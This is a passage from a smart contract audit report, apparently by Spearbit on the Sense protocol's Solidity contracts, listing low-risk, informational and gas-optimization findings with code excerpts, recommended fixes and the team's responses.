+3.3.7 Refrain From Shadowing State Variables Severity: Low Risk Context: Periphery.sol#L351, CAdapter.sol#L133, CAdapter.sol#L156. Situation: Shadowing variables (factory and target), i.e. having function parameters or other local variables declared with the same name, could lead to unintended consequences; it may even indicate underhanded code design. Variable shadowing could also lead to various mistakes on the dev side: if a state variable is shadowed in a function, developers may think they are accessing and/or modifying the state variable when it is actually a local variable. Recommendation: Avoid shadowing of state variables with local variables. One way to avoid this is to consider exclusively prefixing or suffixing an underscore to state variable names, which should make shadowing impossible if followed consistently. Sense: This was fixed in #155 and fixed in #158.

+3.3.8 Maximum Value of tilt Severity: Low Risk Context: Divider.sol#L279-297 Recommendation: Make sure tilt is not larger than FixedMath.WAD; this can be done in the constructor of BaseAdapter.sol#L78-109.

+3.3.9 Reward Has Two Meanings Severity: Low Risk Context: Divider.sol#L157-180, Divider.sol#L334-414 Situation: Reward has two meanings: (1) the sum of all the fees in Divider.sol and (2) COMP tokens in the adapter. This might be confusing. Consider the following code snippet:

    function _collect(...) internal returns (uint256 collected) {
        ...
        Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens // COMP tokens
        ...
    }

    function settleSeries(address adapter, uint48 maturity) external nonReentrant whenNotPaused {
        ...
        // Reward the caller for doing the work of settling the Series at around the correct time
        ...
        ERC20(target).safeTransferFrom(adapter, msg.sender, series[adapter][maturity].reward); // fees
        ...
    }

Recommendation: Give one of the two rewards a different name. Sense: Changed one of the two rewards to a different name.

+3.3.10 Space.sol Contract Missing Necessary Logic To Function As A Balancer Oracle Severity: Low Risk Context: Space.sol, Zero.sol#L15-45, WeightedPool2Tokens.sol Situation: The Space contract is missing the implementation of a number of dependencies and functions that it needs in order to work as a BalancerOracleLike with the MasterOracle and PriceOracles within the Fuse portion of this project. The Zero.sol context notes some of the missing parts.
The Sense team has notified us that it hasn't yet implemented these, as it is in the midst of working on more fully understanding their nuances with the Balancer team. Hence, this is set as low risk: it just entails a portion of the architecture failing to work if deployed at this stage, and the team is unlikely to deploy in this state. Recommendation: Ensure the oracle functionality is properly implemented before deployment, so that all parts of the architecture work as intended.

+3.3.11 Multiple Fixed Math Libraries Severity: Low Risk Context: FixedMath.sol, Rari: FixedPointMathLib.sol, FixedPoint.sol Situation: Three different fixed-point math libraries are used in the code. The more libraries are used for the same intended purpose, the higher the risk of undetected issues arising from potential differences in how they work. The first library, FixedMath.sol, is used in BaseAdapter.sol#L6, CAdapter.sol#L5, CropAdapter.sol#L12, Divider.sol#L10, GClaimManager.sol#L6, Periphery.sol#L7 and WstETHAdapter.sol#L5 as:

    import { FixedMath } from "../external/FixedMath.sol";

The second library, FixedPointMathLib.sol from Rari in the solmate library, is used in LP.sol#L8, Target.sol#L7, Underlying.sol#L7 and Zero.sol#L8 as:

    import { FixedPointMathLib } from "@rari-capital/solmate/src/utils/FixedPointMathLib.sol";

The third library, FixedPoint.sol from Balancer Labs, is used in Space.sol#L6 and SpaceFactory.sol#L5 as:

    import { FixedPoint } from "@balancer-labs/v2-solidity-utils/contracts/math/FixedPoint.sol";

Recommendation: Reduce the number of libraries as much as possible. Also, avoid using different library implementations aiming to achieve the same goal. Choose the one that best suits the needs of your project, is safe, and is backed by audits. Sense: Solmate's FixedPointMathLib was removed here (we would have gone with Solmate's exclusively, but mulDown / mulUp is in next and not in the latest stable version just yet). FixedPoint from Balancer is kept because it is for 0.7.0 and it can do pow functions with floating-point numbers. Spearbit: Acknowledged. Do note, you may wish to check the licenses for that code, as it appears pulled from yield-utils-v2. Following the links to the files, they appear to have BUSL-1.1 as their license, although their root README states all files within the repository are licensed as MIT. Just something for internal consideration.

+3.3.12 Check For Master Oracle Severity: Low Risk Context: LP.sol, Zero.sol Situation: The functions _price() in the contracts ZeroOracle and LPOracle do a call to msg.sender. If msg.sender isn't the master oracle, these calls will fail.

    contract ZeroOracle is PriceOracle, Trust {
        function _price(address zero) internal view returns (uint256) {
            ...
            // assumes the caller is the master oracle, which will have its own way to get the underlying price
            return zeroPrice.fmul(PriceOracle(msg.sender).price(underlying), FixedPointMathLib.WAD); // call to msg.sender
        }
    }

    contract LPOracle is PriceOracle, Trust {
        function _price(address _pool) internal view returns (uint256) {
            ...
            uint256 value = PriceOracle(msg.sender).price(tokenA).fmul(balanceA, FixedPointMathLib.WAD) + // call to msg.sender
                PriceOracle(msg.sender).price(tokenB).fmul(balanceB, FixedPointMathLib.WAD); // call to msg.sender
            ...
        }
    }

Recommendation: Consider verifying that the calling msg.sender is indeed the master oracle. However, since these functions are view, no access control is strictly required.
This just means that if the caller is not a master oracle or another price-oracle type, they are wasting their money on gas, and it is ultimately the caller's issue.

+3.3.13 Implement Checks For g1 and g2 Severity: Low Risk Context: SpaceFactory.sol, Space.sol#L105-144 Situation: The function setParams() does some validity checks on g1 and g2. However, these checks are not present in the constructors of SpaceFactory and Space.sol. This might lead to a situation where the values are set in an incorrect way.

    contract SpaceFactory is Trust {
        constructor(...) Trust(msg.sender) {
            ...
            g1 = _g1; // no checks for g1
            g2 = _g2; // no checks for g2
        }

        function setParams(uint256 _ts, uint256 _g1, uint256 _g2) public requiresTrust {
            // g1 is for swapping Targets to Zeros and should discount the effective interest
            require(_g1 <= FixedPoint.ONE, "INVALID_G1");
            // g2 is for swapping Zeros to Target and should mark the effective interest up
            require(_g2 >= FixedPoint.ONE, "INVALID_G2");
            ...
        }
    }

    contract Space is IMinimalSwapInfoPool, BalancerPoolToken {
        constructor(...) BalancerPoolToken(...) {
            ...
            // Set Yieldspace config; fees are baked into factors `g1` & `g2`,
            // see the "Fees" section of the yieldspace paper
            g1 = _g1; // no checks for g1
            g2 = _g2; // no checks for g2
        }
    }

Recommendation: Add validity checks for g1 and g2 in the constructors of SpaceFactory and Space.sol.

+3.3.14 Check reserves.length Severity: Low Risk Context: Space.sol Situation: Within the functions onJoinPool() and onExitPool(), there is no check on the length of reserves. As onJoinPool() and onExitPool() are called from the Balancer contracts, they are unlikely to be exploited through missing checks on the length of reserves; nevertheless, it is safer to verify the length. In old versions of Solidity (0.4.x), it was possible to send large parameters to an unbounded memory array and overwrite local variables this way.

    function onJoinPool(..., uint256[] memory reserves, ...) external override onlyVault(poolId) returns (...) {
        ... // no checks on length of reserves
    }

    function onExitPool(..., uint256[] memory reserves, ...) external override onlyVault(poolId) returns (...) {
        ... // no checks on length of reserves
    }

Recommendation: Add the following to onJoinPool() and onExitPool():

    require(reserves.length == 2, ...);

+3.3.15 Pause Functionality Risk Severity: Low Risk Context: EmergencyStop.sol, Divider.sol#L5

    import { Pausable } from "@openzeppelin/contracts/security/Pausable.sol";

Situation: There are two ways to pause the protocol: (1) via the modifier whenNotPaused in Divider.sol and (2) via stop() in EmergencyStop.sol. However, other parts of the code, like the balancer/space pool, are not pausable. While some protocols do include pause functionality in their Balancer contracts, that is not the case here. Recommendation: Double check the pause functionality.

+3.3.16 downscaleUp Function Does Not Handle 0 Input Severity: Low Risk Context: Space.sol#L502-525 Situation: The functions _downscaleUp() and _downscaleUpArray() will not work if amount == 0. With a SafeMath library or checked arithmetic, the subtraction will revert; otherwise it underflows.

    function _downscaleUp(uint256 amount, uint256 scalingFactor) internal returns (uint256) {
        return 1 + (amount - 1) / scalingFactor;
    }

    function _downscaleUpArray(uint256[] memory amounts) internal view {
        (uint8 _zeroi, uint8 _targeti) = getIndices();
        amounts[_zeroi] = 1 + (amounts[_zeroi] - 1) / _scalingFactor(true);
        amounts[_targeti] = 1 + (amounts[_targeti] - 1) / _scalingFactor(false);
    }

Recommendation: Use divUp from the Math.sol#L88-96 Balancer Library.
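A zero-safe ceiling division along the lines of Balancer's Math.divUp (a sketch for illustration, not a verbatim copy; the revert string is ours):

    function divUp(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0, "ZERO_DIVISION");
        // Returns ceil(a / b); the a == 0 branch avoids the underflow in (a - 1).
        return a == 0 ? 0 : 1 + (a - 1) / b;
    }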
+3.3.17 Unsafe Use of transfer() and transferFrom() Severity: Low Risk Context: BaseAdapter.sol#L117-137 Situation: The function flashLoan() of BaseAdapter.sol uses the functions transfer() and transferFrom(). However, in the rest of the source, safeTransfer() and safeTransferFrom() are used.

    function flashLoan(...) external onlyPeriphery returns (bool, uint256) {
        require(ERC20(target).transfer(address(receiver), amount), Errors.FlashTransferFailed);
        ...
        require(ERC20(target).transferFrom(address(receiver), address(this), amount), Errors.FlashRepayFailed);
        ...
    }

Recommendation: Using the safe versions is slightly safer and more consistent. We recommend that the Sense team replace transfer() with safeTransfer() and transferFrom() with safeTransferFrom(). Sense: Fixed here. Spearbit: An addendum here for your consideration: there was a recent hack exploiting a safeTransfer implementation that differed from OpenZeppelin's. Technically it was less safe, in that calling it on the zero address or on EOAs would not revert. OZ actually checks that some contract code exists, which removes the possibility that led to this specific exploit. I looked at the solmate implementation; it doesn't check for this either, so it is technically a 'less safe' implementation like the one used in said exploit. Also tested similarly and confirmed. Article regarding the exploit. Do note other variables were at play leading to the exploit, and using solmate's version by itself won't lead you to an exploit. Be aware of this difference from OZ when using it. However, many realizable exploits tend to come from a few holes that can be connected together.

+3.3.18 Verify decimals() <= 18 Severity: Low Risk Context: Space.sol#L132-L133, Periphery.sol#L443, Periphery.sol#L625 Situation: In a few locations in the code, it is assumed that the number of decimals of a token is smaller than or equal to 18. If the number of decimals happens to be larger than 18, an underflow or a revert will occur. Note: Balancer also requires a maximum of 18 decimals, see Balancer Labs v2's WeightedPool2Tokens.sol#L72:

    // These factors are always greater than or equal to one: tokens with more than 18 decimals are not supported.

Recommendation: As the number of decimals of all used tokens is derived from the number of decimals of the Target token, it is sufficient to verify that the Target token has 18 decimals or less. This can be checked in the function deploy() of contract TokenHandler in Divider.sol on line 672.
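A one-line sketch of such a check in deploy() (the parameter name and error string are illustrative, not taken from the codebase):

    require(ERC20(_target).decimals() <= 18, "Unsupported decimals");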
+3.3.19 Preconditions Of addSeries() Unchecked Severity: Low Risk Context: PoolManager.sol#L221-224, Zero.sol#L81 Situation: The function addSeries() should only be executed when the yield space pool has filled its buffer. Although retrieving the oracle's _price() will only work once the buffer is sufficiently filled, it is more defensive to explicitly check the preconditions in the function addSeries().

    contract PoolManager is Trust {
        ...
        function addSeries(address adapter, uint48 maturity) external {
            require(sStatus[adapter][maturity] == SeriesStatus.QUEUED, Errors.SeriesNotQueued);
            ...
        }
    }

    contract ZeroOracle is PriceOracle, Trust {
        function _price(address zero) internal view returns (uint256) {
            ...
            (, , , , , , uint256 sampleTs) = pool.getSample(1023);
            if (sampleTs == 0) { ... }
        }
    }

Recommendation: Consider explicitly checking all preconditions in addSeries().

+3.3.20 Contract Names Differ From File Names Severity: Low Risk Context: LP.sol#L52, Target.sol#L13, Underlying.sol#L13, Zero.sol#L52, IRModel.sol#L8 Situation: Several contracts have a file name that is different from the contract name. In addition, certain Solidity tools expect the file name and the contract name to be the same. This can be confusing for developers or others diving into the code-base. Recommendation: Make the file names and contract names the same.

3.4 Informational Issues

+3.4.1 zero Should Be pool Severity: Informational Context: LP.sol Situation: The function price() in contract LPOracle names its parameter zero. This is probably a copy-paste error; it should be pool, just like in the function _price().

    contract LPOracle is PriceOracle, Trust {
        ...
        function price(address zero) external view override returns (uint256) { // zero should be pool
            return _price(zero);
        }

        function _price(address _pool) internal view returns (uint256) {
            ...
        }
    }

Recommendation: Rename zero to pool.

+3.4.2 Bump Space Contracts to Compile with Latest Solidity 0.7.x Severity: Informational Context: hardhat.config.js#L110 Situation: The deployment scripts do not target the latest available minor version of the previous major Solidity version 0.7.0. They are compiled with 0.7.5, while 0.7.6 is the latest. It was mentioned this was done to match Balancer's contract versions; however, Balancer's deployed contracts on Ethereum mainnet appear to target 0.7.1. Recommendation: Bump to the latest Solidity version 0.7.6 to benefit from a number of bug fixes and from underhanded coding constructs having been disallowed. If an earlier minor version of 0.7.x is required, please note so and why. References: Vault: earliest deployment, Balancer Relayer: one of their earliest deployments.

+3.4.3 Use pragma abicoder v2 Severity: Informational Context: Space.sol#L3, SpaceFactory.sol#L3 Situation: In the latest versions of Solidity 0.7.x, the ABIEncoderV2 is no longer experimental. It is best practice not to use experimental constructs in production code. Recommendation: Replace the following:

    pragma experimental ABIEncoderV2;

with:

    pragma abicoder v2;

+3.4.4 Use Consistent Optimizer Runs for CI And Targeted Deployment Severity: Informational Context: justfile#L102-130, hardhat.config.js#L103-L111 Situation: The testing scripts utilize a different set of optimizer runs than the deployment scripts. The testing scripts are set to 20 runs, while the Space package uses the default of 200 and the other 0.8.11 contracts use 1000 runs. This is problematic, as the tests will essentially be checking bytecode that is different from what will end up being deployed. It can also make it so that the contract's deploy size for the tests meets the 24576-byte maximum limit set during the Spurious Dragon fork, while the deployment builds end up exceeding it and therefore fail. Runs does not indicate how many times the optimizer runs, but how many runs (calls) the contract is expected to serve, and hence whether to optimize for runtime cost or deploy size. The 200 default should generally save on both. Setting runs higher or lower should not affect the speed of the optimizer in a significant manner, so don't try to use lower runs for speed.
The documentation covering the runs parameter is here: Solidity Docs - Optimizer Parameter Runs. Recommendation: Contracts and their backing tests should ideally use the same runs parameter, just as they should compile with the same version of Solidity. Each contract may have its own specific runs parameter set as needed: for an often re-deployed contract that is not called often, lower runs may make sense, while one that will be called many times may want to use higher runs.

+3.4.5 Ensure CI Runs Tests For All Packages Of monorepo Severity: Informational Context: package.json#L12-19, ci.yml, CI for PR #153 Situation: While referencing the CI scripts to help with building the project, it was discovered the CI only runs on the v1-core portion of the project and ignores the others, like v1-fuse and v1-space. This is the case for the commit hash audited and for the latest commit as of b888eda. Recommendation: Ensure the CI runs on all portions of the monorepo, as otherwise bugs may slip through if the team thinks the CI is testing the other packages when in fact it is not.

+3.4.6 Check Function Parameters To Be Non-Zero Severity: Informational Context: setPeriphery() in Divider.sol#L487-492

    /// @notice Set periphery's contract
    /// @param _periphery Target address
    function setPeriphery(address _periphery) external requiresTrust {
        periphery = _periphery;
        emit PeripheryChanged(_periphery);
    }

Situation: In several functions, no checks are done to verify that the supplied parameters are non-zero. Recommendation: Add zero checks to setPeriphery(). Sense: We decided to omit these checks for governance functions.

+3.4.7 Don't Use Hard-coded Values Severity: Informational Context: Zero.sol#L74-L81

    function _price(address zero) internal view returns (uint256) {
        BalancerOracleLike pool = BalancerOracleLike(pools[address(zero)]);
        require(pool != BalancerOracleLike(address(0)), "Zero must have a pool set");
        ...
        (, , , , , , uint256 sampleTs) = pool.getSample(1023);
        ...
    }

Situation: The function _price() in Zero.sol uses a hard-coded value of 1023. Even though Balancer's WeightedPool2Tokens also states 1023, it is not recommended to rely on hard-coded values. The value 1023 is equal to Buffer.SIZE - 1 from Buffer.sol#L20. Buffer.SIZE can also be retrieved via getTotalSamples() in PoolPriceOracle.sol#L76-78.

    function getTotalSamples() external pure override returns (uint256) {
        return Buffer.SIZE;
    }

Recommendation: Use the following code to avoid relying on hard-coded values:

    (, , , , , , uint256 sampleTs) = pool.getSample(pool.getTotalSamples() - 1);

Note: For efficiency purposes, using hard-coded values makes sense. However, it is perhaps safer to import that library and evaluate Buffer.SIZE - 1 as needed, in case of changes. This enhances code maintainability and keeps things safer in case of any changes on the Balancer side. If Balancer confirms to the Sense team that they will never end up changing it, at least for the version of Balancer Sense plans to use, the team may consider keeping the hard-coded approach for gas optimization.

+3.4.8 Consider Separating TokenHandler Into Its Own Source File Severity: Informational Context: Divider.sol#L655-L702. Situation: TokenHandler is a standalone contract that is also specifically deployed in the deployment scripts, but its source is currently buried at the bottom of the Divider's source file. Recommendation: To stay consistent with the rest of the project, this contract should be contained within its own source file.
+3.4.9 Remove Any Lines With Unused Imports Severity: Informational Context: CropAdapter.sol#L5, CropAdapter.sol#L9-10

    import { Periphery } from "../Periphery.sol";
    import { Divider } from "../Divider.sol";

Situation: There are instances where contracts are imported but never used by the importing contract in question. This can affect contract readability, as one may expect the contract to have some used functionality or dependence on the import when it does not. Recommendation: It is best practice not to have dead or unused code, including imports. Remove these occurrences and any others. The noted ones were quickly identified, but there may be other instances the team should explore. Sense: Addressed here.

+3.4.10 Some Functions Can Be Restricted to Pure or View Severity: Informational Context: • Space.sol#L342, Space.sol#L389, Space.sol#L434, • Space.sol#L497, Space.sol#L502 Situation: Declaring a function appropriately as view or pure helps clarify the intent of the function to the end-reader. The more restricted a function is, the "safer" it can be considered, and the intent of state modification/access becomes clearer. A number of functions that could be restricted are not. Recommendation: Declare the most restrictive view/pure specifier available for a function, and only leave it out if that function is planned to have certain state modifications/accesses. Sense: Addressed here.

+3.4.11 Ensure Comments Match Actual Code Logic Severity: Informational Context: • GClaimManager.sol#L106, Space.sol#L433, BaseAdapter.sol#L67-69, • Divider.sol#L538, Periphery.sol#L129 Situation: There are multiple instances where comments in the submitted code do not match the underlying specifications or functionality of the code block they refer to. This hurts code readability and is not best practice. E.g. the following comment is not accurate:

    /// @dev This can't be a view function b/c `Adapter.scale` is not a view function

Adapter.scale is never accessed, and the function is indeed restrictable to view.

    /// @notice The number this function returns will be used to determine its access by checking for binary
    /// digits using the following scheme:
    /// (e.g. 0101 enables `collect` and `issue`, but not `combine`)

The 0101 would in fact enable just init and combine, while restricting issue and collect along with the other parts of Level that are undefined here. A 1 indicates restrict rather than enable as stated here.

    // Determine where the stake should go depending on where we are relative to the maturity date
    address stakeDst = adapters[adapter] ? cup : series[adapter][maturity].sponsor;

The related code never checks the maturity in question, but rather the status of the adapter, which provides no measure of time, as the adapter can be disabled at any point.

    uint256 tBal = Adapter(adapter).wrapUnderlying(uBal); // convert target to underlying

The code logic does the opposite of what is stated; the comment is likely a copy/paste remnant of similar lines. The code actually wraps underlying to target, and the comment should state that. Recommendation: Keep comments updated and consistent alongside code logic.

+3.4.12 Better Define SPONSOR_WINDOW or Document Difference From Other Window with Comments Severity: Informational Context: • Divider.sol#L29, Divider.sol#L30, • Divider.sol#L564, Divider.sol#L566. Situation: A variable named SETTLEMENT_WINDOW provides a window equivalent to its set time of 2 hours for anyone to settle after some preconditions.
SPONSOR_WINDOW, on the other hand, provides a window both before and after some preconditions, effectively doubling its set time from 4 hours to 8 hours, which is inconsistent with how SETTLEMENT_WINDOW is applied. The intent of this is not particularly clear and could be misread as a mistake when consulting the code alone. There were tests within this project confirming this was intended. Recommendation: We recommend changing the variable names (i.e. PRE_SPONSOR_WINDOW and POST_SPONSOR_WINDOW) to make the intent clear that one applies before and the other after the sponsor window. This way their effective windows can be considered cumulatively. In case this is not preferable, we recommend that the Sense team at least make it clear with comments, in both cases, when and how these variables are applied, as they are applied in different circumstances.

+3.4.13 Remove Or Address Unused Variables Severity: Informational Context: Periphery.sol#L32

    uint32 public constant TWAP_PERIOD = 10 minutes; // ideal TWAP interval^

LP.sol#L57

    uint32 public constant TWAP_PERIOD = 1 hours;

Situation: The unused variables could indicate a developer error: either the variables were introduced erroneously, or their accompanying logic is missing or unfinished. They may also introduce unnecessary deployment or runtime cost overhead. Recommendation: Remove the unused variables if they were erroneously included and are not intended to be used. Alternatively, supplement them with the appropriate backing logic that uses the variables. Sense: Fixed in #155.

+3.4.14 Document All Function Parameters And Return Values Severity: Informational Context: Periphery.sol#L253-265 Situation: Most of the time, function parameters are documented with NatSpec. The return parameters are documented far less frequently, especially unnamed return values, like in addLiquidityFromUnderlying(). This makes the code more difficult to read. Note: with the later versions of Solidity, you can also document multiple return values with NatSpec.

    function addLiquidityFromUnderlying(...)
        external
        returns (
            uint256,
            uint256,
            uint256
        )
    {
        ...
    }

Recommendation: Document all the function parameters and return values with NatSpec.

+3.4.15 Simplify Token Ordering Code In Space.sol Severity: Informational Context: Space.sol Situation: The contract Space has a lot of code to manage the order of the tokens in an array. This ordering is necessary because Balancer requires the tokens to be in a specific order: sorted by token address. Recommendation: Use the same representation for the difference between the tokens everywhere, e.g. either a boolean or a uint8. The following snippets could be used:

    tokens[1 - _zeroi] = IERC20(target);

    function getIndices() public view returns (uint8 _zeroi, uint8 _targeti) {
        _zeroi = zeroi;
        _targeti = 1 - _zeroi;
    }

This can be used if scalingFactor() takes a uint8 as a parameter:

    function _upscaleArray(uint256[] memory amounts) internal view {
        amounts[0] *= scalingFactor(0);
        amounts[1] *= scalingFactor(1);
    }

Alternatively, consider using a fixed token order. As the address of the zero token is generated by deploy() in contract TokenHandler in Divider.sol#L682-L689, it is possible to do this via CREATE2. That way you can generate an address for the zero token such that it is smaller than target, and enforce this with a require(zero < target). Trying out different salts for CREATE2 can be done on-chain for a normal target address; with fewer than 10 tries you should be able to find an address that is smaller than target (a sketch of such a search follows).
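A minimal sketch of such an on-chain search (a hypothetical helper; the parameter names are ours, and initCodeHash would be the hash of the zero token's creation code):

    function findSalt(address deployer, bytes32 initCodeHash, address target) internal pure returns (bytes32 salt) {
        for (uint256 i = 0; i < 256; i++) {
            salt = bytes32(i);
            // Standard CREATE2 address derivation:
            // keccak256(0xff ++ deployer ++ salt ++ keccak256(initCode))[12:]
            address predicted = address(uint160(uint256(
                keccak256(abi.encodePacked(bytes1(0xff), deployer, salt, initCodeHash))
            )));
            if (predicted < target) return salt;
        }
        revert("No salt found");
    }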
With computeAddress() of OpenZeppelin's Create2.sol#L57-64, you can calculate the address without deploying. However, if target happens to be a vanity address with a lot of leading zeros, this will not work. In that case, the Sense team should generate an appropriate salt and pass it via sponsorSeries() of Periphery.sol#L66-76 to initSeries() of Divider.sol#L117-130. A tool to generate a vanity address can be found here: ERADICATE2. This way the sort order is fixed and the code of Space can be less complicated.

+3.4.16 Unexpected Functionality of _swapTargetForClaims() Severity: Informational Context: Periphery.sol#L414-431 Situation: The function _swapTargetForClaims() tries to swap target tokens for claim tokens. However, this cannot be done in one step. First, it issues new zero and claim tokens and moves the supplied target to the adapter. Second, it swaps the (unwanted) zero tokens to target tokens. Third, it returns the resulting claim and target tokens to the caller of the function. From a functional point of view this is unexpected: the caller receives target tokens back, which is what the caller started with. This will make the logic on the caller side more complicated.

    function _swapTargetForClaims(...) internal returns (uint256) {
        ...
        // transfer claims & target to user
        ERC20(Adapter(adapter).target()).safeTransfer(msg.sender, tBal);
        ...
    }

Recommendation: Document this behavior of the function in a comment. Alternatively, consider using a flash loan to borrow extra target and return it at the end of the flash loan. Sense: We tried using a flash loan, but ended up doing it this way.

+3.4.17 Keep Build Instructions And Scripts Up To Date Severity: Informational Context: README.md Situation: The provided instructions within the README were not sufficient to successfully build the project. The instructions advise you to install dapptools; however, the project no longer builds with dapptools due to a change in Solidity 0.8.8: remappings are no longer automatically whitelisted in dapptools and need to be explicitly set via the --allow-paths flag. The project at the provided commit is set to build with foundry/forge, whose installation instructions were missing; a specific commit needs to be installed for it to work. There are still a number of project scripts with references to dapptools that fail, such as build and test. Recommendation: Remove any project scripts that are no longer supported or working, and provide working installation instructions in the README on how to successfully build the existing commit.

3.5 Gas Optimizations

+3.5.1 Optimize Levels Library Severity: Gas Optimization Context: Levels.sol Situation: This contract has optimization potential. By replacing the expressions throughout the code with hardcoded values, the compiler will be able to evaluate some of them at build time. Recommendation: Instead of calculating BIT on each run, simply set the bit to the correct decimal representation, in the case of 2**3:

    uint256 private constant _COLLECT_BIT = 8;

Refactor the corresponding function; remove the unnecessary exponentiation, which can become costly:

    function collectDisabled(uint256 level) internal pure returns (bool) {
        return level & _COLLECT_BIT != _COLLECT_BIT;
    }

Repeat this for the other BIT variables and their functions. This helps the compiler omit unnecessary runtime computation through constant folding.
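A hedged sketch contrasting the two patterns (the runtime variant below assumes the original derived the exponent from a non-constant value; the exact original shape may differ):

    library LevelsSketch {
        uint256 private constant _COLLECT_BIT = 8; // 2**3, folded at compile time

        // Hardcoded-constant variant: a single AND plus comparison at runtime.
        function collectDisabled(uint256 level) internal pure returns (bool) {
            return level & _COLLECT_BIT != _COLLECT_BIT;
        }

        // Runtime-exponentiation variant: pays for an EXP on every call.
        function collectDisabledRuntime(uint256 level, uint256 collectIndex) internal pure returns (bool) {
            uint256 bit = 2**collectIndex;
            return level & bit != bit;
        }
    }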
Initial profiling on Remix indicates potential gas savings of 272 to 521 gas with the optimizer set to 200 runs (greater savings on higher-order bits).

+3.5.2 Determine Usage Of WETH Once Severity: Gas Optimization Context: BaseAdapter.sol, CropAdapter.sol, CAdapter.sol Situation: Within the contract CAdapter, _isCETH(_target) / _isCETH(target) is used several times. As target is stored in an immutable variable, it is also possible to store _isCETH(target) in an immutable variable. This will save gas and simplify the code.

    abstract contract BaseAdapter {
        address public immutable target;

        constructor(..., address _target, ...) {
            ...
            target = _target;
        }
    }

    abstract contract CropAdapter is BaseAdapter {
        constructor(..., address _target, ...) BaseAdapter(..., _target, ...) { }
    }

    contract CAdapter is CropAdapter {
        constructor(..., address _target, ...) CropAdapter(..., _target, ...) {
            ...
        }
    }

Occurrences of _isCETH() in CAdapter.sol: • CAdapter.sol#L90, CAdapter.sol#L119, CAdapter.sol#L123, • CAdapter.sol#L127, CAdapter.sol#L151, CAdapter.sol#L172. Additionally, _isCETH() is used to differentiate between WETH and the underlying() token in CAdapter.sol#L90 and CAdapter.sol#L119:

    ERC20 u = ERC20(_isCETH(_target) ? WETH : CTokenInterface(_target).underlying());
    return _isCETH(target) ? WETH : CTokenInterface(target).underlying();

This result can also be stored in an immutable variable to save some gas and simplify the code. Recommendation: Store _isCETH(target) in an immutable variable, and store the result of ERC20(_isCETH(_target) ? WETH : CTokenInterface(_target).underlying()) in an immutable variable. Sense: Fixed here.

+3.5.3 Redundant Calls to setPermissionless() Severity: Gas Optimization Context: EmergencyStop.sol#L18-25

    function stop(address[] memory adapters) external virtual requiresTrust {
        Divider(divider).setPermissionless(false);
        for (uint256 i = 0; i < adapters.length; i++) {
            Divider(divider).setPermissionless(false);
            Divider(divider).setAdapter(adapters[i], false);
            emit Stopped(adapters[i]);
        }
    }

Situation: The function stop() calls setPermissionless(false) multiple times. Calling it once is enough. Recommendation: Remove the redundant call to setPermissionless(false) in the for loop. Sense: Addressed in #155.

+3.5.4 Save with safeTransferFrom in sponsorSeries Severity: Gas Optimization Context: Divider.sol#L117-150, Periphery.sol#L66-L76 Situation: The function sponsorSeries() transfers stake tokens to the Periphery contract and then calls initSeries(), which transfers these same tokens on to the adapter. Note that initSeries() uses the modifier onlyPeriphery, so it can only be called from the Periphery contract. This could also be done in one step, which saves some gas.

    contract Periphery is Trust {
        ...
        function sponsorSeries(address adapter, uint48 maturity) external returns (address zero, address claim) {
            (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();
            ...
            // Transfer stakeSize from sponsor into this contract
            uint256 stakeDecimals = ERC20(stake).decimals();
            ERC20(stake).safeTransferFrom(msg.sender, address(this), _convertToBase(stakeSize, stakeDecimals));
            // Approve divider to withdraw stake assets
            ERC20(stake).safeApprove(address(divider), stakeSize);
            (zero, claim) = divider.initSeries(adapter, maturity, msg.sender);
            ...
        }
    }

    contract Divider is Trust, ReentrancyGuard, Pausable {
        ...
        function initSeries(address adapter, ... ) external onlyPeriphery whenNotPaused returns (address zero, address claim) {
            ...
            (address target, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();
            ...
            ERC20(stake).safeTransferFrom(msg.sender, adapter, stakeSize);
            ...
        }
    }

Recommendation: Consider moving the stake tokens directly to the adapter. Be careful to include all necessary checks.
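A heavily hedged sketch of the one-step variant (names taken from the snippets above; initSeries() would then have to skip its own safeTransferFrom, and any checks it performs around the transfer must be preserved):

    // In Periphery.sponsorSeries(): move the stake straight from the sponsor to the adapter
    ERC20(stake).safeTransferFrom(msg.sender, adapter, _convertToBase(stakeSize, stakeDecimals));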
Sense: We may be in favour of this change, but it "mixes" things: the Divider is supposed to charge the stake from whoever calls initSeries.

+3.5.5 Balancer Tokens Are Already Sorted Severity: Gas Optimization Context: Zero.sol#L74-L110 Situation: Balancer requires tokens to be sorted, so the result of getPoolTokens() is also sorted. This means Sense does not have to discover which token is the zero token.

    function _price(address zero) internal view returns (uint256) {
        ...
        (ERC20[] memory tokens, , ) = BalancerVault(pool.getVault()).getPoolTokens(pool.getPoolId());
        address underlying;
        // tokens[] is sorted, so this check can be optimized
        if (address(zero) == address(tokens[0])) {
            underlying = address(tokens[1]);
        } else {
            underlying = address(tokens[0]);
        }
        ...
    }

Recommendation: Sense could use the following construction, which is in line with the rest of the code:

    // change this line to include _targeti
    (uint8 _zeroi, uint8 _targeti) = getIndices();
    underlying = address(tokens[_targeti]);

+3.5.6 Use Custom Errors Severity: Gas Optimization Context: Errors.sol Situation: Strings are used to encode error messages. With the current Solidity versions, it is possible to replace them with custom errors, which are more gas efficient. Most errors are derived from Errors.sol, but several error messages are also hardcoded. See the examples below: • CAdapter.sol#L139, CAdapter.sol#L157, CAdapter.sol#L164, • SpaceFactory.sol#L66, SpaceFactory.sol#L81, SpaceFactory.sol#L83, • Target.sol#L37, Underlying.sol#L35, WstETHAdapter.sol#L139, • Zero.sol#L76, Zero.sol#L84, Space.sol#L160, • Space.sol#L424, PoolManager.sol#L290 Recommendation: Implement custom errors as explained in the Solidity Language Blog: Custom Errors Explainer.
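A minimal standalone illustration of the pattern (the error name is borrowed from the string constants mentioned in this report purely for illustration):

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.11;

    error SeriesDoesntExists();

    contract CustomErrorDemo {
        mapping(bytes32 => address) public claims;

        function requireSeries(bytes32 key) external view {
            // Reverts with a cheap 4-byte selector instead of an ABI-encoded
            // revert string, saving both deploy size and runtime gas.
            if (claims[key] == address(0)) revert SeriesDoesntExists();
        }
    }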
